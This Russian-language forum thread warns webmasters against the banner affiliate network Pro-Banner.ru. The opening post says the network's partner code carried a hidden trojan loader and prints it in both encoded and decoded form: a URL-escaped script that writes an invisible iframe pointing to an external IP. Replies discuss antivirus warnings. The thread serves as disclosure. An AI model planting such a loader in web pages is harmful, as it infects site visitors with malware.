[Black] Pro-Banner.ru >> Троян

Статус
В этой теме нельзя размещать новые ответы.

Yuzik

Постоялец
Регистрация
28 Июн 2006
Сообщения
218
Реакции
107
По началу дела с партнеркой были неплохие, на то время за 1000 хостов все давали 2 дол, а эти давали по 3.5 долара и доход был не плохой, вывел около 450 доларов

И в один прекрастный день я начал замечать что на мой сайт матюкается антивирус, прийшлось все перешерстить, оказалось в партнерском коде этой системы скрыт лоадер трояна.

И я был вынужден покинуть партнерсво и заказал вывод денег, что были заработаны на тот момент. Они выводятся уже на протяжении 2 недель.

Краткая инструкция по нахождению трояна.
ВНИМАНИЕ!!! ЕСЛИ ВЫ НЕ УВЕРЕНЫ В СВОЕМ АНТИВИРУСЕ - НЕ ЛЕЗТЬ!!!

идем на адрес своего партнерского кода
<script type="text/javascript" src="http://pro-banner.ru/pop.php?id=your_login&site=site.ru"></script>
Для просмотра ссылки Войди или Зарегистрируйся

далее получаем вот такой код
var out="<script type='text/javascript' language='JavaScript' src='http://pro-banner.ru/showbanner.php?id=login&site=site.ru&fs=b89c7a01c36e6d45daa4c3c589fd812c'></script>"; document.write(out);-
Для просмотра ссылки Войди или Зарегистрируйся

грузим это... и в итоге мы получаем немного джава кода где логически представить его исполнение - найдем веб страничку, которая загружает баннер внутри ПопАпа и еще коечто...
<iframe src="http://pro-banner.ru/banner-d-468.html" name="ProBanner" frameborder="0" height="60" scrolling="no" width="468"></iframe>

вот тут находится баннер и зловещий код на который матюкался мой антивирус и конешно же я...
h00p://pro-banner.ru/banner-d-468.html

Вот код самого лоадера трояна
<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Ciframe%2520src%253D%2522http%253A//78.109.21.42/frooolhs/?18%253F18%2522%2520style%253D%2522border%253A1px%2520%2523FFFFFF%2520solide%253B%2522%2520name%253D%2522myiframe%2522%2520scrolling%253D%2522no%2522%2520frameborder%253D%25220%2522%2520align%253Daus%2520marginheight%253D%25220px%2522%2520marginwidth%253D%25220px%2522%2520height%253D%2522480%2522%2520width%253D%25220%2522%253E%253C/iframe%253E%27%3Bd%3Dunescape%28m%29%3Bdocument.write%28d%29%3B%3C/script%3E';d=unescape(m);document.write(d);</script>

Раскодируем код и получим:
<iframe src="http://78.109.21.42/frooolhs/?18?18" style="border:1px #FFFFFF solide;" name="myiframe" scrolling="no" frameborder="0" align=aus marginheight="0px" marginwidth="0px" height="480" width="0"></iframe>

Вот так вот...
В итоге они ******ы.
Не юзайте эту говняную партнерку.
 
Кстати,у меня стоит ESET SS v4,то не пускает даже к ним на сайт )Пишет,что сайт пробует атаковать "нас" )
Странная партнерка,уже с самого начала становится интересно)
 
KIS 8.0 тоже предупредил о том что сайт не безопасен, просто может быть их взломали как часто делают и вешают трой на связки, дайлеры? Что саппот говорит по этому поводу ? прежде чем писать блэк уточни все моменты.
 
KIS 8.0 тоже предупредил о том что сайт не безопасен, просто может быть их взломали как часто делают и вешают трой на связки, дайлеры? Что саппот говорит по этому поводу ? прежде чем писать блэк уточни все моменты.
Посмотри на дату последней новости партнерки. Она уже мертвая.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху